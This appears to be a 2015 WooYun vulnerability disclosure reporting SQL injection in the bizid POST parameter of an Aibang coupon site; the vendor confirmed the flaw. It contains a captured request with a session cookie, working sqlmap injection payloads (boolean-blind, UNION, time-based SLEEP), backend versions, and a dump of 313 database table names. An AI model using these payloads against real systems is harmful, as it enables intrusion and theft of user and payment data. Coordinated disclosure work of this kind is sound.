当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0111496

漏洞标题:爱帮某站存在SQL注入

相关厂商:爱帮网

漏洞作者: 深度安全实验室

提交时间:2015-05-01 18:57

修复时间:2015-06-19 20:12

公开时间:2015-06-19 20:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-01: 细节已通知厂商并且等待厂商处理中
2015-05-05: 厂商已经确认,细节仅向厂商公开
2015-05-15: 细节向核心白帽子及相关领域专家公开
2015-05-25: 细节向普通白帽子公开
2015-06-04: 细节向实习白帽子公开
2015-06-19: 细节向公众公开

简要描述:

详细说明:

http://youhui.aibang.com/


其实原始消息是下面这种格式,但是用GET方法不行,那就只能转换成POST来提交:

1.png


转换后的消息:

POST /? HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://youhui.aibang.com/
Cookie: mid=39; PHPSESSID=71450d98f1d11ba4fde2d0550cbd0cf1; fid=--1430458512--17519120718969; city=%E4%B8%8A%E6%B5%B7
Host: youhui.aibang.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Content-Length: 4
area=discount&bizid=112021&cmd=getextralist&page=2&tid=2943273

bizid参数
盲注:

8.png

9.png

2.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: bizid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: area=discount&bizid=112021 AND 3745=3745&cmd=getextralist&page=2&tid=2943273
Type: UNION query
Title: MySQL UNION query (NULL) - 37 columns
Payload: area=discount&bizid=112021 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7173707271,0x47554779486a41526b6e,0x7162646671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&cmd=getextralist&page=2&tid=2943273
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: area=discount&bizid=112021 AND SLEEP(5)&cmd=getextralist&page=2&tid=2943273
---
web application technology: PHP 5.2.3, Apache 2.2.4
back-end DBMS: MySQL 5.0.11
Database: abpaid
[313 tables]
+---------------------------------+
| ABFunc |
| ABLog |
| ABRole |
| ABRoleFunc |
| ABScore |
| ABScoreHistory |
| ABShowTemplates |
| ABUser |
| AdvIndex |
| AdvInfo |
| AdvPos |
| AdvPosInfo |
| Adv_Contract |
| Adv_Email |
| Adv_EmailMap |
| Adv_Matter |
| Adv_MatterLog |
| Adv_Matter_BaiduListener |
| AlarmSetting |
| BizBindWeibo |
| BizCategory |
| BizInfo |
| BizSuggest |
| Category |
| CityPayRatio |
| ClientActive |
| ClientVersion |
| FriendLink |
| HasYhqPaidBizSortPlan |
| Hotspots |
| KeywordPayRatio |
| KeywordRetView |
| KeywordSuggestion |
| KeywordWhiteList |
| KuaiQianRecvLog |
| KuaiQianSendLog |
| MallProductNewAuto |
| MallProductPlanAuto |
| OftenReplay |
| OrderTask |
| OrderTaskOrderQueue |
| OrderTaskRecord |
| PPC_AB_Union_TelMap |
| PPC_BizAccount |
| PPC_BizAdv |
| PPC_BizAppealCallMap |
| PPC_BizBaseInfo |
| PPC_BizBlackCallMap |
| PPC_BizCallLog |
| PPC_BizExtraInfo |
| PPC_BizNewTel |
| PPC_BizPrice |
| PPC_BizSmsTelMap |
| PPC_BizTel |
| PPC_BizTelBindMap |
| PPC_BizTelBindMap_bak |
| PPC_BizTel_bak |
| PPC_Black |
| PPC_CallPrice |
| PPC_CallRecord |
| PPC_CardGroup |
| PPC_ConsumptionRecord |
| PPC_Contract |
| PPC_League |
| PPC_LeagueCommissionRecord |
| PPC_LostOriginCallRecord |
| PPC_OriginCallRecord |
| PPC_RechargeCard |
| PPC_RechargeRecord |
| PPC_ShowInitTabSets |
| PPC_ShowTab |
| PPC_ShowTabItem |
| PPC_TEL_BACK_OP_MAP |
| PPC_TEL_BACK_OP_MAP_bak |
| PPC_Tel |
| PPC_UnionFinance |
| PaidBiz |
| PaidBizInfoExtra |
| PaidBizShare |
| PaidBizShareSns |
| PaidBizSns |
| PaidBizTemplateSets |
| PaidBiz_Discount_Cate_Map |
| PaidBiz_ParentDiscount_City_Map |
| PaidContentVector |
| PaidContentVector2 |
| PaidContentVector_1 |
| PaidDiscountHistory |
| PaidInclusionYearPrice |
| PaidKeywordsForSearch |
| PaidMessage |
| PaidPlacementPlan |
| PaidProduct |
| PaidProduct2 |
| PaidProductInfo |
| PaidProductInfo2 |
| PaidProduct_bak |
| PaidThread |
| PaidThread_bak |
| Paid_Youhui_Spatial |
| PlanDetailsInfos |
| PlanKeywords |
| PlanPay |
| PpccAlarmLog |
| PpccBiz |
| PpccBizPaymentRecord |
| PpccCategory |
| PpccContract |
| PpccKeycatemap |
| PpccKeyword |
| PpccKeywordSugg |
| PpccOnlineProcess |
| PpccPlan |
| PpccPlanCateMap |
| PromotionMsg |
| PublicNotice |
| QQTuanBGData |
| QQTuanCouponMap |
| QQTuanPayTask |
| QWT_BizDeviceToken |
| QWT_BizDeviceTokenAndroid |
| RankStatusView |
| Regions |
| RegionsPayRatio |
| SequencePayRatio |
| SysMsg |
| SystemConfig |
| TmpPlan |
| TmpPlanKeywords |
| TmpPlanPay |
| ToolUniqueId |
| TuanAdEmailSub |
| TuanAddTuanBizInfo |
| TuanAgent |
| TuanAgentAccount |
| TuanAgentAccountLog |
| TuanAgentExpenseDeduction |
| TuanAgentRecharge |
| TuanAppraiser |
| TuanApprkx |
| TuanAwardee |
| TuanBiz2Tuan |
| TuanBizMarketTabSets |
| TuanBizQuan |
| TuanBizQuanMap |
| TuanCPS |
| TuanCPSClick |
| TuanCPSInfo |
| TuanCPSOrder |
| TuanCate |
| TuanChannel |
| TuanChannelProductRate |
| TuanCharge |
| TuanCityArea |
| TuanCommonQuestion |
| TuanContact |
| TuanCoopErrorLog |
| TuanCoopOrderSync |
| TuanCoopProBiz |
| TuanCoopProBiz_bak |
| TuanCoopProDesc |
| TuanCoopProDesc_bak |
| TuanCoopProPlan |
| TuanCoopProPlan_bak |
| TuanCoopProduct |
| TuanCoopProductJumpLog |
| TuanCoopProductMap |
| TuanCoopProductPics |
| TuanCoopProductPush |
| TuanCoopProduct_bak |
| TuanCoupon |
| TuanCouponList |
| TuanCouponSendSMSLog |
| TuanDeliver |
| TuanDisplayProductCities |
| TuanEmailNoticeList |
| TuanFrmCate |
| TuanFrmChannel |
| TuanFrmClick |
| TuanFrmLog |
| TuanGift |
| TuanInvestigation |
| TuanInvestigationOther |
| TuanInviteClick |
| TuanInviteReg |
| TuanKingdeeAgent |
| TuanKingdeeBiz |
| TuanKingdeeCity |
| TuanKingdeeClerk |
| TuanLotteryAwardee |
| TuanLotteryClick |
| TuanLotteryCoupon |
| TuanLotteryPrize |
| TuanMallAd |
| TuanOrder |
| TuanOrderAttrMap |
| TuanOrderRefund |
| TuanPayPeriods |
| TuanPayPlan |
| TuanPayPlanDetail |
| TuanPaySubmitLog |
| TuanPost |
| TuanPresent |
| TuanPresentAttachHistory |
| TuanPresentCode |
| TuanPresentLog |
| TuanProduct |
| TuanProductAttr |
| TuanProductAuditLog |
| TuanProductBiz |
| TuanProductBizAccount |
| TuanProductDesc |
| TuanProductLimit |
| TuanProductLimitAttrMap |
| TuanProductPlan |
| TuanProductSendAccount |
| TuanProductSpec |
| TuanProductSpecAttrMap |
| TuanQQCBOrder |
| TuanQuestion |
| TuanRefundOrderAuditRecords |
| TuanRefundOrderAuditStatus |
| TuanSNS |
| TuanSNSalipay |
| TuanSNSkaixin001 |
| TuanSNSnetease163 |
| TuanSNSqi360 |
| TuanSNSsina |
| TuanSpecialMarket |
| TuanSpecialMarketOnlineMap |
| TuanSpecialMarketProMap |
| TuanStar |
| TuanSubCate |
| TuanThread |
| TuanUserAccountLog |
| TuanUserAddr |
| TuanUserInfo |
| TuanUserPhoneSns |
| TuanUserRecommendRelation |
| TuanUserRecommendRelationBackup |
| UserDefinedTab |
| UserDefinedTabContent |
| UserDefinedTabSchema |
| UserDefinedTabSubList |
| UserMsg |
| UserQuestions |
| WdePaidBiz |
| WdePaidBizComment |
| WdePaidBizDiscount |
| WdePaidBizProduct |
| WedAct |
| WedActorInfo |
| WtuanSrv |
| XBizCustomInfo |
| XBizTopic |
| XDiscount |
| XDiscountCate |
| XDiscountRecord |
| XDiscount_bak |
| XManageComment |
| XProductCateMap |
| XProductCateMap2 |
| XProductCategory |
| XProductCategory2 |
| XProductComment |
| XQQOnline |
| XSecondaryDomain |
| XTabAccess |
| XVideo |
| XVideoSite |
| YouhuiBrandBiz |
| YoujuSortDefault |
| YoujuSortRule |
| YoujuSortSpecial |
| ZhiFuAlipayMsgLog |
| ZhiFuAlipayTradeLog |
| ZhiFuCmbcMsgLog |
| ZhiFuCmbcTradeLog |
| ZhiFuDnapayMsgLog |
| ZhiFuDnapayTradeLog |
| ZhiFuTenpayMsgLog |
| ZhiFuTenpayTradeLog |
| ZhiFuWYBRecvLog |
| ZhiFuWYBSendLog |
| ZhiFuWYRecvlog |
| ZhiFuWYSendlog |
| ZhiFuWapTenpayMsgLog |
| ZhiFuWapTenpayTradeLog |
| _paidForSearch |
| ab_top_adv |
| bid_index |
| bid_pids |
| bizActionLog |
| bizVisitHistory |
| biz_show_item |
| deal |
| detail_info_adv |
| errorlog |
| h5_abshow_bannerpic |
| h5_abshow_templates |
| h5_give_discount |
| index_pids |
| ip_tbl |
| methodlog |
| plan |
| plan_pic |
| plandesc |
| seo_biz_area_district_map |
| seo_biz_detail |
| seo_biz_page |
| show_adv |
| tmpCp |
| virtual_user |
+---------------------------------+

漏洞证明:

这么多表,随便找一个来点数据吧~

3.jpg

修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-05-05 20:11

厂商回复:

存在该漏洞,谢谢。

最新状态:

暂无


漏洞评价:

评论